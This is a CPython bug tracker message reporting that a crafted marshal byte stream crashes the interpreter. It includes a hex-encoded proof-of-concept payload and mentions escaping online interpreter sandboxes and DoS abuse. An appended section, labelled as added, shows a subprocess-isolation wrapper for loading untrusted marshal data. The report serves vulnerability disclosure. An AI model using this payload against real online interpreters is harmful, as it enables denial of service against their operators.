Author Iman Sharafaldin
Recipients Iman Sharafaldin, christian.heimes, serhiy.storchaka, vstinner
Date 2020-07-12.14:45:22
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1594565123.06.0.21254483975.issue41208@roundup.psfhosted.org>
In-reply-to
Content
There are many online Python interpreters; we can use this malicious file to escape their sandboxes and get control of their Docker container or system (and abuse them, for example, to conduct a DoS attack), as they fully trust that Python doesn't generate a segfault.
For example, the following code clearly kills the interpreter (and a shellcode can be attached), even though they have protection mechanisms for file access and many other things.

-----------
https://www.programiz.com/python-programming/online-compiler/
-----------

import io
import marshal

# Crafted marshal stream from the report; loading it is what triggers the crash.
hex_string = "FBE901000000DA0136E90209000072010000007203000000DA0168A90372010000007205000000DA026161DA026A6A7BDA0278785B020000007201000000DA01353030DA0170E7E10B930189E4414130"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = marshal.load(f)  # the interpreter dies here, so the lines below never run
print(data)
print('We have segfault but we cannot see!')
-------------------
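As an added example (not part of the original report, and not a CPython API): one way a service that must call marshal on untrusted bytes can keep a crash like the one above from taking down the whole process is to do the load in a disposable child interpreter and classify how that child exited. The function name isolated_marshal_load and the sample inputs GOOD and GARBAGE are constructed here for illustration.

```python
import marshal
import subprocess
import sys

# Child program: reads marshal bytes from stdin, loads them, writes a repr of
# the result to stdout. If marshal crashes, only this child process dies.
_CHILD = (
    "import marshal, sys\n"
    "data = sys.stdin.buffer.read()\n"
    "obj = marshal.loads(data)\n"
    "sys.stdout.write(repr(obj))\n"
)


def isolated_marshal_load(data: bytes, timeout: float = 5.0):
    """Load marshal bytes in a throwaway interpreter process.

    Returns ("ok", repr_of_object) on success, ("error", text) for a
    Python-level exception or timeout, or ("crashed", signal_number) when the
    child was killed by a signal such as SIGSEGV. The parent process never
    calls marshal.loads on the untrusted data itself.
    """
    try:
        proc = subprocess.run(
            [sys.executable, "-I", "-c", _CHILD],
            input=data, capture_output=True, timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return ("error", "timeout")
    if proc.returncode == 0:
        return ("ok", proc.stdout.decode("utf-8", "replace"))
    if proc.returncode < 0:
        # POSIX: a negative return code means the child was killed by a
        # signal (e.g. -11 for SIGSEGV on Linux).
        return ("crashed", -proc.returncode)
    return ("error", proc.stderr.decode("utf-8", "replace").strip())


# Constructed sample inputs for demonstration.
GOOD = marshal.dumps((1, "two", [3.0]))  # produced by this interpreter
GARBAGE = b"\xff\xfe\xfd\xfc" * 4        # not a valid marshal stream

if __name__ == "__main__":
    print(isolated_marshal_load(GOOD))
    print(isolated_marshal_load(GARBAGE))
```

Returning a repr rather than the object is deliberate: handing the child's output back through marshal would reintroduce the same parser in the parent, so a real service would pass results back in a format such as JSON.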
History
Date                 User              Action  Args
2020-07-12 14:45:23  Iman Sharafaldin  set     recipients: + Iman Sharafaldin, vstinner, christian.heimes, serhiy.storchaka
2020-07-12 14:45:23  Iman Sharafaldin  set     messageid: <1594565123.06.0.21254483975.issue41208@roundup.psfhosted.org>
2020-07-12 14:45:23  Iman Sharafaldin  link    issue41208 messages
2020-07-12 14:45:22  Iman Sharafaldin  create